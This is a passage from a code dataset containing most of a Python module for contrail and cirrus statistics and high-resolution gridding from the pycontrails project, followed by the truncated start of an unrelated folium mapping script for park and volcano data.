humidity_scaling.eval(met)\n rhi = met[\"rhi\"].data.sel(level=slice(150, 300))\n is_issr = rhi > 1\n\n # Cirrus in a longitude-latitude grid\n if cirrus_coverage is None:\n cirrus_coverage = cirrus_coverage_single_level(time, met, contrails)\n\n # Calculate statistics\n area = geo.grid_surface_area(met[\"longitude\"].values, met[\"latitude\"].values)\n weights = area / np.nansum(area)\n\n stats = {\n \"issr_percentage_coverage\": (\n np.nansum((is_issr * weights)) / (np.nansum(weights) * len(rhi.level))\n ) * 100,\n \"mean_rhi_in_issr\": np.nanmean(rhi.values[is_issr.values]),\n \"contrail_cirrus_percentage_coverage\": (\n np.nansum((area * cirrus_coverage[\"contrails\"].data)) / np.nansum(area)\n ) * 100,\n \"contrail_cirrus_clear_sky_percentage_coverage\": (\n np.nansum((area * cirrus_coverage[\"contrails_clear_sky\"].data)) / np.nansum(area)\n ) * 100,\n \"natural_cirrus_percentage_coverage\": (\n np.nansum((area * cirrus_coverage[\"natural_cirrus\"].data)) / np.nansum(area)\n ) * 100,\n }\n return pd.Series(stats)\n\n\ndef radiation_time_slice_statistics(\n rad: MetDataset, time: np.datetime64 | pd.Timestamp\n) -> pd.Series:\n \"\"\"\n Calculate radiation statistics in the domain provided.\n\n Parameters\n ----------\n rad : MetDataset\n Single level dataset containing the `sdr`, `rsr` and `olr`.\n time : np.datetime64 | pd.Timestamp\n Time when the radiation statistics is computed.\n\n Returns\n -------\n pd.Series\n Mean SDR, RSR and OLR in domain area.\n \"\"\"\n rad.ensure_vars((\"sdr\", \"rsr\", \"olr\"))\n surface_area = geo.grid_surface_area(rad[\"longitude\"].values, rad[\"latitude\"].values)\n weights = surface_area.values / np.nansum(surface_area)\n stats = {\n \"mean_sdr_domain\": np.nansum(rad[\"sdr\"].data.sel(level=-1, time=time).values * weights),\n \"mean_rsr_domain\": np.nansum(rad[\"rsr\"].data.sel(level=-1, time=time).values * weights),\n \"mean_olr_domain\": np.nansum(rad[\"olr\"].data.sel(level=-1, time=time).values * weights),\n }\n return pd.Series(stats)\n\n\ndef area_mean_ice_water_path(\n iwc: npt.NDArray[np.float_],\n plume_mass_per_m: npt.NDArray[np.float_],\n segment_length: npt.NDArray[np.float_],\n domain_area: float,\n) -> float:\n \"\"\"\n Calculate area-mean contrail ice water path.\n\n Ice water path (IWC) is the contrail ice mass divided by the domain area of interest.\n\n Parameters\n ----------\n iwc : npt.NDArray[np.float_]\n Contrail ice water content, i.e., contrail ice mass per kg of\n air, [:math:`kg_{H_{2}O}/kg_{air}`]\n plume_mass_per_m : npt.NDArray[np.float_]\n Contrail plume mass per unit length, [:math:`kg m^{-1}`]\n segment_length : npt.NDArray[np.float_]\n Contrail segment length for each waypoint, [:math:`m`]\n domain_area : float\n Domain surface area, [:math:`m^{2}`]\n\n Returns\n -------\n float\n Mean contrail ice water path, [:math:`kg m^{-2}`]\n \"\"\"\n return np.nansum(iwc * plume_mass_per_m * segment_length) / domain_area\n\n\ndef area_mean_ice_particle_radius(\n r_ice_vol: npt.NDArray[np.float_],\n n_ice_per_m: npt.NDArray[np.float_],\n segment_length: npt.NDArray[np.float_],\n) -> float:\n r\"\"\"\n Calculate the area-mean contrail ice particle radius.\n\n Parameters\n ----------\n r_ice_vol : npt.NDArray[np.float_]\n Ice particle volume mean radius for each waypoint, [:math:`m`]\n n_ice_per_m : npt.NDArray[np.float_]\n Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n segment_length : npt.NDArray[np.float_]\n Contrail segment length for each waypoint, [:math:`m`]\n\n Returns\n -------\n float\n Area-mean contrail ice particle radius `r_area`, [:math:`\\mu m`]\n\n Notes\n -----\n - Re-arranged from `tot_ice_cross_sec_area` = `tot_n_ice_particles` * (np.pi * `r_ice_vol`**2)\n - Assumes that the contrail ice crystals are spherical.\n \"\"\"\n tot_ice_cross_sec_area = _total_ice_particle_cross_sectional_area(\n r_ice_vol, n_ice_per_m, segment_length\n )\n tot_n_ice_particles = _total_ice_particle_number(n_ice_per_m, segment_length)\n return (tot_ice_cross_sec_area / (np.pi * tot_n_ice_particles)) ** (1 / 2) * 10**6\n\n\ndef volume_mean_ice_particle_radius(\n r_ice_vol: npt.NDArray[np.float_],\n n_ice_per_m: npt.NDArray[np.float_],\n segment_length: npt.NDArray[np.float_],\n) -> float:\n r\"\"\"\n Calculate the volume-mean contrail ice particle radius.\n\n Parameters\n ----------\n r_ice_vol : npt.NDArray[np.float_]\n Ice particle volume mean radius for each waypoint, [:math:`m`]\n n_ice_per_m : npt.NDArray[np.float_]\n Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n segment_length : npt.NDArray[np.float_]\n Contrail segment length for each waypoint, [:math:`m`]\n\n Returns\n -------\n float\n Volume-mean contrail ice particle radius `r_vol`, [:math:`\\mu m`]\n\n Notes\n -----\n - Re-arranged from `tot_ice_vol` = `tot_n_ice_particles` * (4 / 3 * np.pi * `r_ice_vol`**3)\n - Assumes that the contrail ice crystals are spherical.\n \"\"\"\n tot_ice_vol = _total_ice_particle_volume(r_ice_vol, n_ice_per_m, segment_length)\n tot_n_ice_particles = _total_ice_particle_number(n_ice_per_m, segment_length)\n return (tot_ice_vol / ((4 / 3) * np.pi * tot_n_ice_particles)) ** (1 / 3) * 10**6\n\n\ndef mean_ice_particle_effective_radius(\n r_ice_vol: npt.NDArray[np.float_],\n n_ice_per_m: npt.NDArray[np.float_],\n segment_length: npt.NDArray[np.float_],\n) -> float:\n r\"\"\"\n Calculate the mean contrail ice particle effective radius.\n\n Parameters\n ----------\n r_ice_vol : npt.NDArray[np.float_]\n Ice particle volume mean radius for each waypoint, [:math:`m`]\n n_ice_per_m : npt.NDArray[np.float_]\n Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n segment_length : npt.NDArray[np.float_]\n Contrail segment length for each waypoint, [:math:`m`]\n\n Returns\n -------\n float\n Mean contrail ice particle effective radius `r_eff`, [:math:`\\mu m`]\n\n Notes\n -----\n - `r_eff` is the ratio of the particle volume to particle projected area.\n - `r_eff` = (3 / 4) * (`tot_ice_vol` / `tot_ice_cross_sec_area`)\n - See Eq. (62) of :cite:`schumannContrailCirrusPrediction2012`.\n \"\"\"\n tot_ice_vol = _total_ice_particle_volume(r_ice_vol, n_ice_per_m, segment_length)\n tot_ice_cross_sec_area = _total_ice_particle_cross_sectional_area(\n r_ice_vol, n_ice_per_m, segment_length\n )\n return (3 / 4) * (tot_ice_vol / tot_ice_cross_sec_area) * 10**6\n\n\ndef _total_ice_particle_cross_sectional_area(\n r_ice_vol: npt.NDArray[np.float_],\n n_ice_per_m: npt.NDArray[np.float_],\n segment_length: npt.NDArray[np.float_],\n) -> float:\n \"\"\"\n Calculate total contrail ice particle cross-sectional area.\n\n Parameters\n ----------\n r_ice_vol : npt.NDArray[np.float_]\n Ice particle volume mean radius for each waypoint, [:math:`m`]\n n_ice_per_m : npt.NDArray[np.float_]\n Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n segment_length : npt.NDArray[np.float_]\n Contrail segment length for each waypoint, [:math:`m`]\n\n Returns\n -------\n float\n Total ice particle cross-sectional area from all contrail waypoints, [:math:`m^{2}`]\n \"\"\"\n ice_cross_sec_area = 0.9 * np.pi * r_ice_vol**2\n return np.nansum(ice_cross_sec_area * n_ice_per_m * segment_length)\n\n\ndef _total_ice_particle_volume(\n r_ice_vol: npt.NDArray[np.float_],\n n_ice_per_m: npt.NDArray[np.float_],\n segment_length: npt.NDArray[np.float_],\n) -> float:\n \"\"\"\n Calculate total contrail ice particle volume.\n\n Parameters\n ----------\n r_ice_vol : npt.NDArray[np.float_]\n Ice particle volume mean radius for each waypoint, [:math:`m`]\n n_ice_per_m : npt.NDArray[np.float_]\n Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n segment_length : npt.NDArray[np.float_]\n Contrail segment length for each waypoint, [:math:`m`]\n\n Returns\n -------\n float\n Total ice particle volume from all contrail waypoints, [:math:`m^{2}`]\n \"\"\"\n ice_vol = (4 / 3) * np.pi * r_ice_vol**3\n return np.nansum(ice_vol * n_ice_per_m * segment_length)\n\n\ndef _total_ice_particle_number(\n n_ice_per_m: npt.NDArray[np.float_], segment_length: npt.NDArray[np.float_]\n) -> float:\n \"\"\"\n Calculate total number of contrail ice particles.\n\n Parameters\n ----------\n n_ice_per_m : npt.NDArray[np.float_]\n Number of ice particles per distance for each waypoint, [:math:`m^{-1}`]\n segment_length : npt.NDArray[np.float_]\n Contrail segment length for each waypoint, [:math:`m`]\n\n Returns\n -------\n float\n Total number of ice particles from all contrail waypoints.\n \"\"\"\n return np.nansum(n_ice_per_m * segment_length)\n\n\ndef area_mean_contrail_property(\n contrail_property: npt.NDArray[np.float_],\n segment_length: npt.NDArray[np.float_],\n width: npt.NDArray[np.float_],\n domain_area: float,\n) -> float:\n \"\"\"\n Calculate area mean contrail property.\n\n Used to calculate the area mean `tau_contrail`, `tau_cirrus`, `sdr`, `rsr`, `olr`, `rf_sw`,\n `rf_lw` and `rf_net`.\n\n Parameters\n ----------\n contrail_property : npt.NDArray[np.float_]\n Selected contrail property for each waypoint\n segment_length : npt.NDArray[np.float_]\n Contrail segment length for each waypoint, [:math:`m`]\n width : npt.NDArray[np.float_]\n Contrail width for each waypoint, [:math:`m`]\n domain_area : float\n Domain surface area, [:math:`m^{2}`]\n\n Returns\n -------\n float\n Area mean contrail property\n \"\"\"\n return np.nansum(contrail_property * segment_length * width) / domain_area\n\n\ndef percentage_cloud_contrail_overlap(\n contrail_cover: float | np.ndarray, contrail_cover_clear_sky: float | np.ndarray\n) -> float | np.ndarray:\n \"\"\"\n Calculate the percentage area of cloud-contrail overlap.\n\n Parameters\n ----------\n contrail_cover : float | np.ndarray\n Percentage of contrail cirrus cover without overlap with natural cirrus.\n See `cirrus_coverage_single_level` function.\n contrail_cover_clear_sky : float | np.ndarray\n Percentage of contrail cirrus cover in clear sky conditions.\n See `cirrus_coverage_single_level` function.\n\n Returns\n -------\n float | np.ndarray\n Percentage of cloud-contrail overlap\n \"\"\"\n return np.where(\n contrail_cover_clear_sky > 0,\n 100 - (contrail_cover / contrail_cover_clear_sky * 100),\n 0,\n )\n\n\n# ---------------------------------------\n# High resolution grid: contrail segments\n# ---------------------------------------\n\n\ndef contrails_to_hi_res_grid(\n time: pd.Timestamp | np.datetime64,\n contrails_t: GeoVectorDataset,\n *,\n var_name: str,\n spatial_bbox: tuple[float, float, float, float] = (-180.0, -90.0, 180.0, 90.0),\n spatial_grid_res: float = 0.05,\n) -> xr.DataArray:\n r\"\"\"\n Aggregate contrail segments to a high-resolution longitude-latitude grid.\n\n Parameters\n ----------\n time : pd.Timestamp | np.datetime64\n UTC time of interest.\n contrails_t : GeoVectorDataset\n All contrail waypoint outputs at `time`.\n var_name : str\n Contrail property for aggregation, where `var_name` must be included in `contrail_segment`.\n For example, `tau_contrail`, `rf_sw`, `rf_lw`, and `rf_net`\n spatial_bbox : tuple[float, float, float, float]\n Spatial bounding box, `(lon_min, lat_min, lon_max, lat_max)`, [:math:`\\deg`]\n spatial_grid_res : float\n Spatial grid resolution, [:math:`\\deg`]\n\n Returns\n -------\n xr.DataArray\n Contrail segments and their properties aggregated to a longitude-latitude grid.\n \"\"\"\n # Ensure the required columns are included in `contrails_t`\n cols_req = [\n \"flight_id\",\n \"waypoint\",\n \"longitude\",\n \"latitude\",\n \"altitude\",\n \"time\",\n \"sin_a\",\n \"cos_a\",\n \"width\",\n var_name,\n ]\n contrails_t.ensure_vars(cols_req)\n\n # Ensure that the times in `contrails_t` are the same.\n is_in_time = contrails_t[\"time\"] == time\n if not np.all(is_in_time):\n warnings.warn(\n f\"Contrails have inconsistent times. Waypoints that are not in {time} are removed.\"\n )\n contrails_t = contrails_t.filter(is_in_time)\n\n main_grid = _initialise_longitude_latitude_grid(spatial_bbox, spatial_grid_res)\n\n # Contrail head and tails: continuous segments only\n heads_t = contrails_t.dataframe\n heads_t.sort_values([\"flight_id\", \"waypoint\"], inplace=True)\n tails_t = heads_t.shift(periods=-1)\n\n is_continuous = heads_t[\"continuous\"]\n heads_t = heads_t[is_continuous].copy()\n tails_t = tails_t[is_continuous].copy()\n tails_t[\"waypoint\"] = tails_t[\"waypoint\"].astype(\"int\")\n\n heads_t.set_index([\"flight_id\", \"waypoint\"], inplace=True, drop=False)\n tails_t.index = heads_t.index\n\n # Aggregate contrail segments to a high resolution longitude-latitude grid\n try:\n from tqdm.auto import tqdm\n except ModuleNotFoundError as exc:\n raise ModuleNotFoundError(\"Install the 'tqdm' package\") from exc\n\n for i in tqdm(heads_t.index[:2000]):\n contrail_segment = GeoVectorDataset(\n pd.concat([heads_t[cols_req].loc[i], tails_t[cols_req].loc[i]], axis=1).T, copy=True\n )\n\n segment_grid = segment_property_to_hi_res_grid(\n contrail_segment, var_name=var_name, spatial_grid_res=spatial_grid_res\n )\n main_grid = _add_segment_to_main_grid(main_grid, segment_grid)\n\n return main_grid\n\n\ndef _initialise_longitude_latitude_grid(\n spatial_bbox: tuple[float, float, float, float] = (-180.0, -90.0, 180.0, 90.0),\n spatial_grid_res: float = 0.05,\n) -> xr.DataArray:\n r\"\"\"\n Create longitude-latitude grid of specified coordinates and spatial resolution.\n\n Parameters\n ----------\n spatial_bbox : tuple[float, float, float, float]\n Spatial bounding box, `(lon_min, lat_min, lon_max, lat_max)`, [:math:`\\deg`]\n spatial_grid_res : float\n Spatial grid resolution, [:math:`\\deg`]\n\n Returns\n -------\n xr.DataArray\n Longitude-latitude grid of specified coordinates and spatial resolution, filled with zeros.\n\n Notes\n -----\n This empty grid is used to store the aggregated contrail properties of the individual\n contrail segments, such as the gridded contrail optical depth and radiative forcing.\n \"\"\"\n lon_coords = np.arange(spatial_bbox[0], spatial_bbox[2] + spatial_grid_res, spatial_grid_res)\n lat_coords = np.arange(spatial_bbox[1], spatial_bbox[3] + spatial_grid_res, spatial_grid_res)\n return xr.DataArray(\n np.zeros((len(lon_coords), len(lat_coords))),\n dims=[\"longitude\", \"latitude\"],\n coords={\"longitude\": lon_coords, \"latitude\": lat_coords},\n )\n\n\ndef segment_property_to_hi_res_grid(\n contrail_segment: GeoVectorDataset,\n *,\n var_name: str,\n spatial_grid_res: float = 0.05,\n) -> xr.DataArray:\n r\"\"\"\n Convert the contrail segment property to a high-resolution longitude-latitude grid.\n\n Parameters\n ----------\n contrail_segment : GeoVectorDataset\n Contrail segment waypoints (head and tail).\n var_name : str\n Contrail property of interest, where `var_name` must be included in `contrail_segment`.\n For example, `tau_contrail`, `rf_sw`, `rf_lw`, and `rf_net`\n spatial_grid_res : float\n Spatial grid resolution, [:math:`\\deg`]\n\n Returns\n -------\n xr.DataArray\n Contrail segment dimension and property projected to a longitude-latitude grid.\n\n Notes\n -----\n - See Appendix A11 and A12 of :cite:`schumannContrailCirrusPrediction2012`.\n \"\"\"\n # Ensure that `contrail_segment` contains the required variables\n contrail_segment.ensure_vars((\"sin_a\", \"cos_a\", \"width\", var_name))\n\n # Ensure that `contrail_segment` only contains two waypoints and have the same time.\n assert len(contrail_segment) == 2\n assert contrail_segment[\"time\"][0] == contrail_segment[\"time\"][1]\n\n # Calculate contrail edges\n (\n contrail_segment[\"lon_edge_l\"],\n contrail_segment[\"lat_edge_l\"],\n contrail_segment[\"lon_edge_r\"],\n contrail_segment[\"lat_edge_r\"],\n ) = contrail_edges(\n contrail_segment[\"longitude\"],\n contrail_segment[\"latitude\"],\n contrail_segment[\"sin_a\"],\n contrail_segment[\"cos_a\"],\n contrail_segment[\"width\"],\n )\n\n # Initialise contrail segment grid with spatial domain that covers the contrail area.\n lon_edges = np.concatenate(\n [contrail_segment[\"lon_edge_l\"], contrail_segment[\"lon_edge_r\"]], axis=0\n )\n lat_edges = np.concatenate(\n [contrail_segment[\"lat_edge_l\"], contrail_segment[\"lat_edge_r\"]], axis=0\n )\n spatial_bbox = geo.spatial_bounding_box(lon_edges, lat_edges, buffer=0.5)\n segment_grid = _initialise_longitude_latitude_grid(spatial_bbox, spatial_grid_res)\n\n # Calculate gridded contrail segment properties\n weights = _pixel_weights(contrail_segment, segment_grid)\n dist_perpendicular = _segment_perpendicular_distance_to_pixels(contrail_segment, weights)\n plume_concentration = _gaussian_plume_concentration(\n contrail_segment, weights, dist_perpendicular\n )\n\n # Distribute selected contrail property to grid\n return plume_concentration * (\n weights * xr.ones_like(weights) * contrail_segment[var_name][1]\n + (1 - weights) * xr.ones_like(weights) * contrail_segment[var_name][0]\n )\n\n\ndef _pixel_weights(contrail_segment: GeoVectorDataset, segment_grid: xr.DataArray) -> xr.DataArray:\n \"\"\"\n Calculate the pixel weights for `segment_grid`.\n\n Parameters\n ----------\n contrail_segment : GeoVectorDataset\n Contrail segment waypoints (head and tail).\n segment_grid : xr.DataArray\n Contrail segment grid with spatial domain that covers the contrail area.\n\n Returns\n -------\n xr.DataArray\n Pixel weights for `segment_grid`\n\n Notes\n -----\n - See Appendix A12 of :cite:`schumannContrailCirrusPrediction2012`.\n - This is the weights (from the beginning of the contrail segment) to the nearest longitude and\n latitude pixel in the `segment_grid`.\n - The contrail segment do not contribute to the pixel if weight < 0 or > 1.\n \"\"\"\n head = contrail_segment.dataframe.iloc[0]\n tail = contrail_segment.dataframe.iloc[1]\n\n # Calculate determinant\n dx = units.longitude_distance_to_m(\n (tail[\"longitude\"] - head[\"longitude\"]),\n 0.5 * (head[\"latitude\"] + tail[\"latitude\"]),\n )\n dy = units.latitude_distance_to_m(tail[\"latitude\"] - head[\"latitude\"])\n det = dx**2 + dy**2\n\n # Calculate pixel weights\n lon_grid, lat_grid = np.meshgrid(\n segment_grid[\"longitude\"].values, segment_grid[\"latitude\"].values\n )\n dx_grid = units.longitude_distance_to_m(\n (lon_grid - head[\"longitude\"]),\n 0.5 * (head[\"latitude\"] + lat_grid),\n )\n dy_grid = units.latitude_distance_to_m((lat_grid - head[\"latitude\"]))\n weights = (dx * dx_grid + dy * dy_grid) / det\n return xr.DataArray(\n data=weights.T,\n dims=[\"longitude\", \"latitude\"],\n coords={\"longitude\": segment_grid[\"longitude\"], \"latitude\": segment_grid[\"latitude\"]},\n )\n\n\ndef _segment_perpendicular_distance_to_pixels(\n contrail_segment: GeoVectorDataset, weights: xr.DataArray\n) -> xr.DataArray:\n \"\"\"\n Calculate perpendicular distance from contrail segment to each segment grid pixel.\n\n Parameters\n ----------\n contrail_segment : GeoVectorDataset\n Contrail segment waypoints (head and tail).\n weights : xr.DataArray\n Pixel weights for `segment_grid`.\n See `_pixel_weights` function.\n\n Returns\n -------\n xr.DataArray\n Perpendicular distance from contrail segment to each segment grid pixel, [:math:`m`]\n\n Notes\n -----\n - See Figure A7 of :cite:`schumannContrailCirrusPrediction2012`.\n \"\"\"\n head = contrail_segment.dataframe.iloc[0]\n tail = contrail_segment.dataframe.iloc[1]\n\n # Longitude and latitude along contrail segment\n lon_grid, lat_grid = np.meshgrid(weights[\"longitude\"].values, weights[\"latitude\"].values)\n\n lon_s = head[\"longitude\"] + weights.T.values * (tail[\"longitude\"] - head[\"longitude\"])\n lat_s = head[\"latitude\"] + weights.T.values * (tail[\"latitude\"] - head[\"latitude\"])\n\n lon_dist = units.longitude_distance_to_m(np.abs(lon_grid - lon_s), 0.5 * (lat_s + lat_grid))\n\n lat_dist = units.latitude_distance_to_m(np.abs(lat_grid - lat_s))\n dist_perp = (lon_dist**2 + lat_dist**2) ** 0.5\n return xr.DataArray(dist_perp.T, coords=weights.coords)\n\n\ndef _gaussian_plume_concentration(\n contrail_segment: GeoVectorDataset,\n weights: xr.DataArray,\n dist_perpendicular: xr.DataArray,\n) -> xr.DataArray:\n \"\"\"\n Calculate relative gaussian plume concentration along the contrail width.\n\n Parameters\n ----------\n contrail_segment : GeoVectorDataset\n Contrail segment waypoints (head and tail).\n weights : xr.DataArray\n Pixel weights for `segment_grid`.\n See `_pixel_weights` function.\n dist_perpendicular : xr.DataArray\n Perpendicular distance from contrail segment to each segment grid pixel, [:math:`m`]\n See `_segment_perpendicular_distance_to_pixels` function.\n\n Returns\n -------\n xr.DataArray\n Relative gaussian plume concentration along the contrail width\n\n Notes\n -----\n - Assume a one-dimensional Gaussian plume.\n - See Appendix A11 of :cite:`schumannContrailCirrusPrediction2012`.\n \"\"\"\n head = contrail_segment.dataframe.iloc[0]\n tail = contrail_segment.dataframe.iloc[1]\n\n width = weights.values * tail[\"width\"] + (1 - weights.values) * head[\"width\"]\n sigma_yy = 0.125 * width**2\n\n concentration = np.where(\n (weights.values < 0) | (weights.values > 1),\n 0,\n (4 / np.pi) ** 0.5 * np.exp(-0.5 * dist_perpendicular.values**2 / sigma_yy),\n )\n return xr.DataArray(concentration, coords=weights.coords)\n\n\ndef _add_segment_to_main_grid(main_grid: xr.DataArray, segment_grid: xr.DataArray) -> xr.DataArray:\n \"\"\"\n Add the gridded contrail segment to the main grid.\n\n Parameters\n ----------\n main_grid : xr.DataArray\n Aggregated contrail segment properties in a longitude-latitude grid.\n segment_grid : xr.DataArray\n Contrail segment dimension and property projected to a longitude-latitude grid.\n\n Returns\n -------\n xr.DataArray\n Aggregated contrail segment properties, including `segment_grid`.\n\n Notes\n -----\n - The spatial domain of `segment_grid` only covers the contrail segment, which is added to\n the `main_grid` which is expected to have a larger spatial domain than the `segment_grid`.\n - This architecture is used to reduce the computational resources.\n \"\"\"\n lon_main = main_grid[\"longitude\"].values\n lat_main = main_grid[\"latitude\"].values\n\n lon_segment_grid = np.round(segment_grid[\"longitude\"].values, decimals=2)\n lat_segment_grid = np.round(segment_grid[\"latitude\"].values, decimals=2)\n\n main_grid_arr = main_grid.values\n subgrid_arr = segment_grid.values\n\n try:\n ix_ = np.searchsorted(lon_main, lon_segment_grid[0])\n ix = np.searchsorted(lon_main, lon_segment_grid[-1]) + 1\n iy_ = np.searchsorted(lat_main, lat_segment_grid[0])\n iy = np.searchsorted(lat_main, lat_segment_grid[-1]) + 1\n except IndexError:\n warnings.warn(\n \"Contrail segment ignored as it is outside spatial bounding box of the main grid. \"\n )\n else:\n main_grid_arr[ix_:ix, iy_:iy] = main_grid_arr[ix_:ix, iy_:iy] + subgrid_arr\n\n return xr.DataArray(main_grid_arr, coords=main_grid.coords)\n\n\n# ------------------------------------\n# High resolution grid: natural cirrus\n# ------------------------------------\n\n\ndef natural_cirrus_properties_to_hi_res_grid(\n met: MetDataset,\n *,\n spatial_grid_res: float = 0.05,\n optical_depth_threshold: float = 0.1,\n random_state: np.random.Generator | int | None = None,\n) -> MetDataset:\n r\"\"\"\n Increase the longitude-latitude resolution of natural cirrus cover and optical depth.\n\n Parameters\n ----------\n met : MetDataset\n Pressure level dataset for one time step containing 'air_temperature', 'specific_humidity',\n 'specific_cloud_ice_water_content', 'geopotential',and `fraction_of_cloud_cover`\n spatial_grid_res : float\n Spatial grid resolution for the output, [:math:`\\deg`]\n optical_depth_threshold : float\n Sensitivity of cirrus detection, set at 0.1 to match the capability of satellites.\n random_state : np.random.Generator | int | None\n A number used to initialize a pseudorandom number generator.\n\n Returns\n -------\n MetDataset\n Single-level dataset containing the high resolution natural cirrus properties.\n\n References\n ----------\n - :cite:`schumannContrailCirrusPrediction2012`\n\n Notes\n -----\n - The high-resolution natural cirrus coverage and optical depth is distributed randomly,\n ensuring that the mean value is equal to the value of the original grid.\n - Enhancing the spatial resolution is necessary because the existing spatial resolution of\n numerical weather prediction (NWP) models are too coarse to resolve the coverage area of\n relatively narrow contrails.\n \"\"\"\n # Ensure the required columns are included in `met`\n met.ensure_vars(\n (\n \"air_temperature\",\n \"specific_humidity\",\n \"specific_cloud_ice_water_content\",\n \"geopotential\",\n \"fraction_of_cloud_cover\",\n )\n )\n\n # Ensure `met` only contains one time step, constraint can be relaxed in the future.\n if len(met[\"time\"].data) > 1:\n raise AssertionError(\n \"`met` contains more than one time step, but function only accepts one time step. \"\n )\n\n # Calculate tau_cirrus as observed by satellites\n met[\"tau_cirrus\"] = tau_cirrus(met)\n tau_cirrus_max = met[\"tau_cirrus\"].data.sel(level=met[\"level\"].data[-1])\n\n # Calculate cirrus coverage as observed by satellites, cc_max(x,y,t) = max[cc(x,y,z,t)]\n cirrus_cover_max = met[\"fraction_of_cloud_cover\"].data.max(dim=\"level\")\n\n # Increase resolution of longitude and latitude dimensions\n lon_coords_hi_res, lat_coords_hi_res = _hi_res_grid_coordinates(\n met[\"longitude\"].values, met[\"latitude\"].values, spatial_grid_res=spatial_grid_res\n )\n\n # Increase spatial resolution by repeating existing values (temporarily)\n n_reps = int(\n np.round(np.diff(met[\"longitude\"].values)[0], decimals=2)\n / np.round(np.diff(lon_coords_hi_res)[0], decimals=2)\n )\n cc_rep = _repeat_rows_and_columns(cirrus_cover_max.values, n_reps=n_reps)\n tau_cirrus_rep = _repeat_rows_and_columns(tau_cirrus_max.values, n_reps=n_reps)\n\n # Enhance resolution of `tau_cirrus`\n rng = np.random.default_rng(random_state)\n rand_number = rng.uniform(0, 1, np.shape(tau_cirrus_rep))\n dx = 0.03 # Prevent division of small values: calibrated to match the original cirrus cover\n has_cirrus = rand_number > (1 + dx - cc_rep)\n\n tau_cirrus_hi_res = np.zeros_like(tau_cirrus_rep)\n tau_cirrus_hi_res[has_cirrus] = tau_cirrus_rep[has_cirrus] / cc_rep[has_cirrus]\n\n # Enhance resolution of `cirrus coverage`\n cirrus_cover_hi_res = np.where(tau_cirrus_hi_res > optical_depth_threshold, 1, 0)\n\n # Package outputs\n ds_hi_res = xr.Dataset(\n data_vars=dict(\n tau_cirrus=([\"longitude\", \"latitude\"], tau_cirrus_hi_res),\n cc_natural_cirrus=([\"longitude\", \"latitude\"], cirrus_cover_hi_res),\n ),\n coords=dict(longitude=lon_coords_hi_res, latitude=lat_coords_hi_res),\n )\n ds_hi_res = ds_hi_res.expand_dims({\"level\": np.array([-1])})\n ds_hi_res = ds_hi_res.expand_dims({\"time\": met[\"time\"].values})\n return MetDataset(ds_hi_res)\n\n\ndef _hi_res_grid_coordinates(\n lon_coords: npt.NDArray[np.float_],\n lat_coords: npt.NDArray[np.float_],\n *,\n spatial_grid_res: float = 0.05,\n) -> tuple[npt.NDArray[np.float_], npt.NDArray[np.float_]]:\n r\"\"\"\n Calculate longitude and latitude coordinates for the high resolution grid.\n\n Parameters\n ----------\n lon_coords : npt.NDArray[np.float_]\n Longitude coordinates provided by the original `MetDataset`.\n lat_coords : npt.NDArray[np.float_]\n Latitude coordinates provided by the original `MetDataset`.\n spatial_grid_res : float\n Spatial grid resolution for the output, [:math:`\\deg`]\n\n Returns\n -------\n tuple[npt.NDArray[np.float_], npt.NDArray[np.float_]\n Longitude and latitude coordinates for the high resolution grid.\n \"\"\"\n d_lon = np.abs(np.diff(lon_coords)[0])\n d_lat = np.abs(np.diff(lat_coords)[0])\n is_whole_number = (d_lon / spatial_grid_res) - int(d_lon / spatial_grid_res) == 0\n\n if (d_lon <= spatial_grid_res) | (d_lat <= spatial_grid_res):\n raise ArithmeticError(\n \"Spatial resolution of `met` is already higher than `spatial_grid_res`\"\n )\n\n if not is_whole_number:\n raise ArithmeticError(\n \"Select a spatial grid resolution where `spatial_grid_res / existing_grid_res` is \"\n \"a whole number. \"\n )\n\n lon_coords_hi_res = np.arange(\n lon_coords[0], lon_coords[-1] + spatial_grid_res, spatial_grid_res\n )\n\n lat_coords_hi_res = np.arange(\n lat_coords[0], lat_coords[-1] + spatial_grid_res, spatial_grid_res\n )\n\n return (np.round(lon_coords_hi_res, decimals=3), np.round(lat_coords_hi_res, decimals=3))\n\n\ndef _repeat_rows_and_columns(\n array_2d: npt.NDArray[np.float_], *, n_reps: int\n) -> npt.NDArray[np.float_]:\n \"\"\"\n Repeat the elements in `array_2d` along each row and column.\n\n Parameters\n ----------\n array_2d : npt.NDArray[np.float_, np.float_]\n 2D array containing `tau_cirrus` or `cirrus_coverage` across longitude and latitude.\n n_reps : int\n Number of repetitions.\n\n Returns\n -------\n npt.NDArray[np.float_, np.float_]\n 2D array containing `tau_cirrus` or `cirrus_coverage` at a higher spatial resolution.\n See :func:`_hi_res_grid_coordinates`.\n \"\"\"\n dimension = np.shape(array_2d)\n\n # Repeating elements along axis=1\n array_1d_rep = [np.repeat(array_2d[i, :], n_reps) for i in np.arange(dimension[0])]\n stacked = np.vstack(array_1d_rep)\n\n # Repeating elements along axis=0\n array_2d_rep = np.repeat(stacked, n_reps, axis=0)\n\n # Do not repeat final row and column as they are on the edge\n return array_2d_rep[: -(n_reps - 1), : -(n_reps - 1)]\n","repo_name":"contrailcirrus/pycontrails","sub_path":"pycontrails/models/cocip/output_formats.py","file_name":"output_formats.py","file_ext":"py","file_size_in_byte":76989,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"50"} +{"seq_id":"29690467304","text":"import folium\r\nimport pandas\r\n\r\ndata = pandas.read_excel(\"parquesyjardines1.xlsx\", sheet_name = 0)\r\nlat = list(data[\"Lat\"])\r\nlon = list(data[\"Lon\"])\r\ndir = list(data[\"Dirección\"])\r\npla = list(data[\"Plaza\"])\r\nsup = list(data[\"Superficie\"])\r\n\r\ndata = pandas.read_csv(\"volcanoes.txt\")\r\nlat1 = list(data[\"LAT\"])\r\nlon1 = list(data[\"LON\"])\r\nelev = list(data[\"ELEV\"])\r\n\r\nhtml1 = \"\"\"

    Volcano information:

